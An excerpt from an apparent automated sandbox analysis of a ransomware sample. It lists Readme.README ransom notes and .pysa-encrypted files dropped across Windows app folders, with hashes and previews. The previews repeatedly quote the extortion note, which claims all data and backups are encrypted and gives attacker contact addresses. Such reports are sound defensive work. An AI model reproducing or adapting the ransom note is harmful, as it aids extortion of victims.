                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\RoamingState\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\Settings\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\Settings\settings.dat.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):9216
                  Entropy (8bit):7.682538196165285
                  Encrypted:false
                  SSDEEP:192:FX2TR5+Xy0QbQQubwSSNzhlVAneUwNkmsEQ48ApEoTLxflCve2lZp7:F2l504QRwlllSneUwNkm6kVfAvrF7
                  MD5:C2CBD38FD696DB1ABC1F2DF02E9D4094
                  SHA1:824F5E39BF8B0C4C165A866DF0A1C3796D66BC65
                  SHA-256:56BB42236DF8DAA599F781FA3111B66AFE18114CA3B960AD274A5D4B26491E76
                  SHA-512:569181D4899656A927F824BC1094E2D9021C7FD052CB564FC8CAF6BB0F98A8222FAA9896FDF6FA29FECB03010AB162320706EB43EE4D6006E6382C79C7E289DD
                  Malicious:false
                  C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\SystemAppData\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\TempState\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\AC\INetCache\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\AC\INetCookies\ESE\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\AC\INetCookies\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\AC\INetHistory\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\AC\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\AC\Temp\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  Malicious:false
                  C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\AppData\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  Malicious:false
                  C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalCache\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  Malicious:false
                  C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalState\Files\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  Malicious:false
                  C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalState\Files\S0\1\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  Malicious:false
                  C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalState\Files\S0\2\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  Malicious:false
                  C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalState\Files\S0\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  Malicious:false
                  C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalState\LocalFiles\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  Malicious:false
                  C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\LocalState\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  Malicious:false
                  C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  Malicious:false
                  C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\RoamingState\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  Malicious:false
                  C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\Settings\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  Malicious:false
                  C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\SystemAppData\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  Malicious:false
                  C:\Users\user\AppData\Local\Packages\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\TempState\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  Malicious:false
                  C:\Users\user\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\AC\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  Malicious:false
                  C:\Users\user\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\AppData\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  Malicious:false
                  C:\Users\user\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalCache\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  Malicious:false
                  C:\Users\user\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  Malicious:false
                  C:\Users\user\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  Malicious:false
                  C:\Users\user\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\RoamingState\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\Settings\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\Settings\settings.dat.LOG1.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):9216
                  Entropy (8bit):7.669690463239471
                  Encrypted:false
                  SSDEEP:192:wH8OYEbAL/pi/e7I45vPRxshOxMgIfVlVDBNdSSq70oy+U28CqcPbLrb:FibALRiX45n8hOx5ulVvdSSq70XZobj
                  MD5:015A2880B506737714DD8B85BCB7BADF
                  SHA1:12DC508D5368B80940F6331E6F71D1C8AAAF05AC
                  SHA-256:51BA09123B42A11DD328ED96111BCAFA3CE1CFBF46267678C9641B75A9CB774D
                  SHA-512:1667835D97D1ED194DEB1CCEC2B6DCDB7FC88BE178697982F14BD654689E730C1E9D252D8F96DA0C411FEE3DF77A8C5643D3B9F30997A6CEBF0F6F35A1C5AFA0
                  Malicious:false
                  C:\Users\user\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\Settings\settings.dat.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):9216
                  Entropy (8bit):7.676744734289598
                  Encrypted:false
                  SSDEEP:192:kLiZSGxx5cs2wR4BmYuyXu8oG3bsNi7mBAGkzZ93h5+:BZlxWwdY1e8ogSi7mebzbhg
                  MD5:3C5EF2877AFB0CB1781DD5DCF5F3D046
                  SHA1:700F2A1E9EBEED9D6714AC30B990F3AC454D7BF8
                  SHA-256:9B30845D6088534A176E701711D9675E3FCBAD1603BCB129204466BD503F323F
                  SHA-512:D8EDD2BB2F5CE516B1125610E3E6E29CB529B2BC47A6AAA4B60C29140B7F534D6D2163510C38B0AD22C92DA7FF067528574618660209223522D985BE7D33E52D
                  Malicious:false
                  C:\Users\user\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\SystemAppData\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\TempState\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Packages\windows_ie_ac_001\AC\INetCache\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1599
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLF
                  MD5:33BAEE98E6812F33006EC1904131C43E
                  SHA1:6B21E5528FF8A4B3B5F2D1AC2E3D1849C273B648
                  SHA-256:81E8B5A8328AA847298DEE38F3C49EB5331F19C1E585E692AC61E1EDA731801A
                  SHA-512:3749BAE2D1F62FDB0758F23C75D14B3521825606513DD03C9B3CC1741A3E9A75FE519B3EF61302FBCD172F4CA8E325716897DFBE6B8B15246821E3034955162D
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Packages\windows_ie_ac_001\AC\INetCookies\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1599
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
